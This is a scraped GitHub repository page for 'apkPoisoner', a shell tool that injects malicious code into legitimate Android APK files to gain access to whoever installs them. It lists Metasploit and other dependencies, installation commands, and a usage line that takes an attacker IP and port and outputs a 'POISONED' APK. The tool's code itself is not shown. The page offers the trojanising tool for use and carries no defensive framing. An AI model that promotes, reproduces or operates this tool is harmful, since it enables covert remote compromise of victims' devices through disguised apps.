Skip to content

Tool made to inject malicious code inside a legitimate apk in order to gain access to the infected device.

Notifications You must be signed in to change notification settings

Invertebr4do/apkPoisoner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 
 
 

Repository files navigation

apkPoisoner

Tool made to inject malicious code inside a legitimate apk in order to gain access to the infected device.

DEPENDENCIES

  • java
  • metasploit-framework
  • zipalign
  • sponge
  • wget

INSTALLATION

git clone https://github.com/Invertebr4do/apkPoisoner.git
cd apkPoisoner && chmod +x apkPoisoner.sh

USAGE

./apkPoisoner.sh -i [IP_ADDRESS] -p [LOCAL_PORT] -a /PATH/TO/APK.apk 

The malicious apk file is saved on [APKPOISONER_DIRECTORY]/out/POISONED_[APP_NAME].apk

About

Tool made to inject malicious code inside a legitimate apk in order to gain access to the infected device.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages